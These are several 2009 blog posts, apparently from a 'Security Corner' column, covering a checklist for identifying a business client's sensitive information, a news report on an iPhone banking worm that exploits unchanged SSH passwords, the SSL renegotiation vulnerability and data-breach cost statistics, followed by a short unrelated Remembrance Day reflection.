What is “Sensitive Information”?

This second part part of a multi-part series on creating an information management plan for business clients.

Basically, any information that your client would not want posted on the bulletin board is potentially sensitive information. Many clients will say that they to not have that much sensitive data on their systems. This may be true, but there are some questions we have to ask them.

Do you have sensitive information?

- Do you process any “keyed” credit card transactions or take any credit card information over the telephone? If so, is the credit card information ever written on a piece of paper? What happens to that paper after the transaction is processed? (The PCD DSS requires that the paper be shredded immediately in a crosscut shredder) What controls (written policies, supervision, etc,) are in place to ensure that this happens?

- Is any credit card information kept on file, either on paper or in an electronic form? The PCI DSS requires that access to such records be controlled. The PCI DSS also clearly states that the 3-digit security code on the back of the card MUST NOT be recorded or stored – it should not be written down in a paper file or stored electronically, even in an encrypted form.

- Do you process payroll or keep any employee files (practically every employer does maintain employee information, even if they contract payroll to a third-party)?

- Do you maintain customer or client lists that you do not share with all everyone in the business and/or the public?

- Do you maintain financial records for clients or business partners?

- Do you maintain client or patient records that you are required by law to protect (examples would be PIPDEDA in Canada, HIPAA for health information in the US, GLBA for financial records in the US – every country has laws requiring protection for certain types of records. You need to research laws in your country)?

- Do you maintain records about ongoing projects, bids, company process, or other information that you have developed, “company secrets”, ways that you do things, etc. that you would not want to be made public?

- Do you have internal or external correspondences or documents (emails, internal memos, etc.) that you would not want to share with everyone in your organization?

Most businesses clients will answer “yes” to one or more of these questions. If there are no controls in place to protect sensitive data, it should be assumed that ANYONE who wants to could access that data. All businesses have SOME controls in place – our job is the determine what controls ARE in place and what controls SHOULD be in place, based on the answers to the questions above.

Next: Data Classification

Dennis H in West Virginia, US

November 26, 2009

Jail-breaking an iPhone handset invalidates the warranty says Apple.

A second worm to hit the iPhone has been unearthed by security company F-Secure.

It is specifically targeting people in the Netherlands who are using their iPhones for internet banking with Dutch online bank ING.

It redirects the bank’s customers to a lookalike site with a log-in screen.

The worm attacks “jail-broken” phones – a modification which enables the user to run non-Apple approved software on their handset.

The handsets at risk also have SSH (secure shell) installed.

Many people use SSH so other programs can remotely connect to an iPhone and, among other things, transfer files. It comes with a default password, “alpine” which should be changed.

Only users who have installed SSH and not changed the password are at risk.

The new worm is more serious than the first because it can behave like a botnet, warns F-Secure.

This enables the phone to be accessed or controlled remotely without the permission of its owner.

Read more about this

Source: BBC News

My apologies for the lapse in Security Corner Posts. The next one will continue the series on building an Information Management Plan for clients.

There has been a lot of talk the past couple of weeks about the recently-discovered session renegotiation vulnerability in SSL. If you are interested in the details, here is a link to a .pdf of the original research. Here is a link to another article discussing the vulnerability. Mr. Google can find many more for you. This week’s episode of Security Now! will be devoted to this subject as well.

What does this mean to us and to clients? What are the real risks? These questions are difficult to answer at this point, because not all of the details have been made public. Initial reports focused on SSL connections that employ client-side certificates, which would not include most connections. Ironically, client-side certificates are generally considered more secure. However, since the protocol allows for more session renegotiation when using client-side certs, the risk is increased. There are more recent reports of attacks that do not involve client-side certs.

All versions of this attack require a successful MITM (man-in-the-middle) attack to be established first. This means that WIFI connections, especially on a public network, do present a real risk. A wired connection to a home or office network presents little risk, as does a well-secured wireless connection.

There have been reports of attacks “in the wild”, and at least one successful attack against twitter.

All browsers and all web servers are affected, but there is already a patch available for OpenVPN that addresses the issue. it will be a while before there are patches for all browsers and web servers. I will keep tabs on this and post news as it develops. In the meantime, even SSL connections are not necessarily secure when in on a public network.

Here are some interesting stats from a webinar on cloud security that I attended today:

The average “hard cost” (not including the cost of lost business or damaged reputation) of a data breach is $202 PER RECORD. The “less tangible” costs, such as loss of business, are often much higher. Remember this when advising clients about data protection, which has a cost. The cost of not protecting data can be much higher.

65% of data losses are caused by someone with privileged access (employees, contractors, etc). This includes malicious acts and errors.

40% of losses are caused by a third-party service supplier or contractor.

We focus a lot of thought and energy on hackers and outside attacks, but these are certainly not the only threats.

Dennis H in West Virginia, US

November 20, 2009

I come from several hundred years of Mennonite tradition as a heritage. In the years of migratory history, our basic tenets were:

1. Exemption from military service
2. Freedom to have our own schools

While I’m grateful and proud of our history of peace, I am even more grateful to the veterans and their families that have made our peace and prosperity possible. Without the bravery of such willing soldiers, we would not have the freedom today to pursue our faith, family & fiscal responsibilities like we are today. Today we honour the brave and the fallen especially for what they’ve done.

A video worth watching by Terry Kelly is called “Pittance of Time”: